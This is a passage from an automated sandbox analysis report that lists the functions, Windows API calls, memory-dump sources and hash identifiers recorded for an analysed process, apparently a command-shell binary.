                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F101D6
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10212
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10228
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F1023C
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF744F1E904,?,?,?,?,00000000,00007FF744F13491,?,?,?,00007FF744F24420), ref: 00007FF744F10251
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction ID: 1dca9756e8f8f9b455c54d60a1b5b15015b9caac53f0f8f28fa142f89f77c4b2
                              • Opcode Fuzzy Hash: 9ca52e2f36e6298e0da0b73f4c48285a799823b45280523adb4bff91af1efe56
                              • Instruction Fuzzy Hash: 2D21513190C682CBE7507F66A5C4238FAA0FF5A755F9C5134DE0E46AD8CE7CA848A720
                              Function 00007FF744F13578 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              • _get_osfhandle.MSVCRT ref: 00007FF744F13584
                              • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F1359C
                              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135C3
                              • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135D9
                              • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F135ED
                              • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF744F032E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF744F13602
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                              • String ID:
                              • API String ID: 513048808-0
                              • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction ID: 140e26a0a81a26be845006019222410ba0b7a0bba6d3e7769f1cf0147624425b
                              • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                              • Instruction Fuzzy Hash: 13114F31A0CA42C7EB50BF26A5C4478EAA0FB49B65F995334DD6F427D8CE3CD845A610
                              Function 00007FF744F19584 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                              • String ID:
                              • API String ID: 4104442557-0
                              • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction ID: c0aac1a5d9c9774d1e9bb96ac3a74788abd524ddc1d268ca31471514ad1a90e4
                              • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                              • Instruction Fuzzy Hash: 54114226A09B41CBEF00FF62E88416873A4F719758F840A34EE6D47B98DF3CD5648350
                              Function 00007FF744F2711C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 175COMMON
                              Download Yara Rule
                              APIs
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F271F9
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F2720D
                              • OpenSemaphoreW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F27300
                                • Part of subcall function 00007FF744F25740: CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00007FF744F275C4,?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F25744
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: OpenSemaphore$CloseErrorHandleLast
                              • String ID: _p0$wil
                              • API String ID: 455305043-1814513734
                              • Opcode ID: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction ID: 614ba4b4d610974da8b7c18f55219536cf8e185883ac7472873659df69b94f40
                              • Opcode Fuzzy Hash: 39a27b84dfd8631c9037e55d178cc10ed73d1848b9dee361412bcbd5f2f98ace
                              • Instruction Fuzzy Hash: 22617F62B1DA42C6EF25BF5694901B9A3E1FF84B80F985431DE0E077D8DE3EE9049720
                              Function 00007FF744F01DC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: wcschr$Heapiswspacememset$AllocProcess
                              • String ID: %s
                              • API String ID: 2401724867-3043279178
                              • Opcode ID: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction ID: 3edd747d2199c897a522bd6553674ebe464d90abb40cf5eea045486bc718f3b2
                              • Opcode Fuzzy Hash: 68dfd2aa9ebba26de86c3f9daebedc58b35cbe7b50de7833d958d4803dd9749a
                              • Instruction Fuzzy Hash: 9451B632A0C682C9EB20BF12D8812B9B3A0FB45B95F884135DE4D476D9EF3DE551E720
                              Function 00007FF744F0E260 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 128COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: iswdigit
                              • String ID: GeToken: (%x) '%s'
                              • API String ID: 3849470556-1994581435
                              • Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction ID: 71ad371b7eaf1b042f937ec726f05ad92c86e8e437788caaa9165878371b26b0
                              • Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
                              • Instruction Fuzzy Hash: 67515721A0C652C5F724BF57A488279BAA0FB94B54F898035DE5D433D8DF7CE840A720
                              Function 00007FF744F2992C Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 121registryCOMMON
                              Download Yara Rule
                              APIs
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F29A10
                              • RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF744F29994
                                • Part of subcall function 00007FF744F2A73C: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A77A
                                • Part of subcall function 00007FF744F2A73C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A839
                                • Part of subcall function 00007FF744F2A73C: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF744F29A82), ref: 00007FF744F2A850
                              • wcsrchr.MSVCRT ref: 00007FF744F29A62
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$CloseEnumOpenwcsrchr
                              • String ID: %s=%s$.
                              • API String ID: 3242694432-4275322459
                              • Opcode ID: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction ID: 9458a3f77c32027030299baf705d7ec20bb33211ee9e05745ac92dc0288a6f3b
                              • Opcode Fuzzy Hash: f0a6781f902405e6d501dc5d40a6bf5070585413eea37f1d1ba285c718ededde
                              • Instruction Fuzzy Hash: 87418F21B0D742D6FB20BF52A0D46B9E2A0FF857A0F984230DD5D07BD9DE7DE841A621
                              Function 00007FF744F254B0 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 120synchronizationCOMMON
                              Download Yara Rule
                              APIs
                              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF744F254E6
                              • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF744F2552E
                                • Part of subcall function 00007FF744F2758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F275AE
                                • Part of subcall function 00007FF744F2758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF744F26999,?,?,?,?,?,00007FF744F18C39), ref: 00007FF744F275C6
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: ErrorLast$CreateCurrentMutexProcess
                              • String ID: Local\SM0:%d:%d:%hs$wil$x
                              • API String ID: 779401067-630742106
                              • Opcode ID: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                              • Instruction ID: 531682a42dd5e595d84137838f8262ab961d76ffc342aee04beb6b73c5d69694
                              • Opcode Fuzzy Hash: 455202d7a479b8eb008443c79237f92c22bbe4b1cb8e523106a0b0b2338ac627
                              • Instruction Fuzzy Hash: 0F51517261CA82C2EB11BF12E4817FAE761FB84784F985031DE4D4BA99DE3DE5059720
                              Function 00007FF744F1417C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CurrentDirectorytowupper
                              • String ID: :$:
                              • API String ID: 238703822-3780739392
                              • Opcode ID: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                              • Instruction ID: 6a1739d4197885be1fa52fd6ff8288cd383429b62c7c3149edcad05856b9d2c0
                              • Opcode Fuzzy Hash: a6328a6c3dc4b43d0528279963caee78f723bc6a38f6b0cfe87d14265630f542
                              • Instruction Fuzzy Hash: 9311225260C641C6EB25BF22A885279F6F0FF89B9AF898032DD0D077D8DE3CD401A724
                              Function 00007FF744F058D4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38registryCOMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                              • API String ID: 3677997916-3870813718
                              • Opcode ID: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                              • Instruction ID: 12c99cc74c7c9501c942a234a230a2c28cdc0197fa1eb933d34c7904247d1490
                              • Opcode Fuzzy Hash: f05f94d0e8c90ab29cc9672b6bad58f1af5175f7397cd948b2f834cc6da7e466
                              • Instruction Fuzzy Hash: 2E114F3261DB45C7E720EF51E48426AF760FB867A4F845131DA8D02BA8DF7CD048DB10
                              Function 00007FF744F04C18 Relevance: 7.7, APIs: 5, Instructions: 163COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memsetwcsrchr$wcschr
                              • String ID:
                              • API String ID: 110935159-0
                              • Opcode ID: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                              • Instruction ID: 64850c81aa5c64565f59349cb8ff4efdcc1a27e937297cdf75b005b3a0e97741
                              • Opcode Fuzzy Hash: aa437b30edfeea6c79ee8a3d268e9650db73263b89b04e44864cdff78747c223
                              • Instruction Fuzzy Hash: 1751C922B0D682D5FB21BF5395853F9E290BB89BA4F8D4531CD5D077C9DE3CE541A210
                              Function 00007FF744F15EE4 Relevance: 7.6, APIs: 5, Instructions: 146COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$CurrentDirectorytowupper
                              • String ID:
                              • API String ID: 1403193329-0
                              • Opcode ID: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                              • Instruction ID: ff57a0c5e879edbc62072159cd9d456372d70bc833037fdf1f1642a3676038f4
                              • Opcode Fuzzy Hash: 551be3f87909853a01787b2c064555cc9cf119e68c8c6485403ce92ba455aa8e
                              • Instruction Fuzzy Hash: 5A518726A0D681C6EB25BF2299906B9B7B0FF44758F898135CE4E076D8DF3CD944A720
                              Function 00007FF744F091C0 Relevance: 7.6, APIs: 5, Instructions: 138COMMON
                              Download Yara Rule
                              APIs
                              • memset.MSVCRT ref: 00007FF744F0921C
                              • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF744F093AA
                                • Part of subcall function 00007FF744F08B20: wcsrchr.MSVCRT ref: 00007FF744F08BAB
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BD4
                                • Part of subcall function 00007FF744F08B20: _wcsicmp.MSVCRT ref: 00007FF744F08BF2
                                • Part of subcall function 00007FF744F08B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F08C16
                                • Part of subcall function 00007FF744F08B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F08C2F
                                • Part of subcall function 00007FF744F08B20: wcschr.MSVCRT ref: 00007FF744F08CB3
                                • Part of subcall function 00007FF744F1417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF744F141AD
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,0000000A,00007FF744F092AC), ref: 00007FF744F130CA
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F130DD
                                • Part of subcall function 00007FF744F13060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F130F6
                                • Part of subcall function 00007FF744F13060: SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F13106
                              • wcsrchr.MSVCRT ref: 00007FF744F092D8
                              • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF744F09362
                              • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF744F09373
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                              • String ID:
                              • API String ID: 3966000956-0
                              • Opcode ID: b940a3ae0cbd3b0dcc09caeba803782aba8febc90d450ee18c078e27142e0860
                              • Instruction ID: 9977b9394cfed374984784c542f1a6e826c9a196667761af652819163b531725
                              • Opcode Fuzzy Hash: b940a3ae0cbd3b0dcc09caeba803782aba8febc90d450ee18c078e27142e0860
                              • Instruction Fuzzy Hash: E1518432A0D682C5EB61BF12D4946B9A3A4FB89B44F884035DE4D07BD9EF3CE551D710
                              Function 00007FF744F02A30 Relevance: 7.6, APIs: 5, Instructions: 119COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: memset$_setjmp
                              • String ID:
                              • API String ID: 3883041866-0
                              • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                              • Instruction ID: 1b07fd967b6852c9a62d21352cedaf2fa829f14f46e09f35c8833a3c848662b8
                              • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                              • Instruction Fuzzy Hash: CB513F72A0CB86CAEB61AF22D8943E9B7A4EB85748F844135DA4D47A8CDF3CD644D710
                              Function 00007FF744F0DF60 Relevance: 7.6, APIs: 5, Instructions: 114memoryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000004.00000002.1445661837.00007FF744F01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF744F00000, based on PE: true
                              • Associated: 00000004.00000002.1445647053.00007FF744F00000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445688999.00007FF744F32000.00000002.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F3D000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445703506.00007FF744F4F000.00000004.00000001.01000000.00000004.sdmpDownload File
                              • Associated: 00000004.00000002.1445763960.00007FF744F59000.00000002.00000001.01000000.00000004.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_4_2_7ff744f00000_alpha.jbxd
                              Similarity
                              • API ID: Heap$FreeProcess_setjmp
                              • String ID:
                              • API String ID: 777023205-0
                              • Opcode ID: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                              • Instruction ID: 2f355adb4958759424d8430ded893d2b1ecac5a46c6c1c32609d4f7c0f7f34f4
                              • Opcode Fuzzy Hash: bbf52200d93ced3108c92f56beefed0410d329e72fd007d8cbedcbd411aea915
                              • Instruction Fuzzy Hash: 3051243094DA42CAFB10BF53A8C4579F6A0BF98790FDC5435DE4D427E9DE3CA440A621
                              Function 00007FF744F0B49C Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 106COMMON
                              Download Yara Rule
                              APIs
                              • _wcsicmp.MSVCRT ref: 00007FF744F0B4BD
                                • Part of subcall function 00007FF744F106C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106D6
                                • Part of subcall function 00007FF744F106C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF744F0B4DB), ref: 00007FF744F106F0
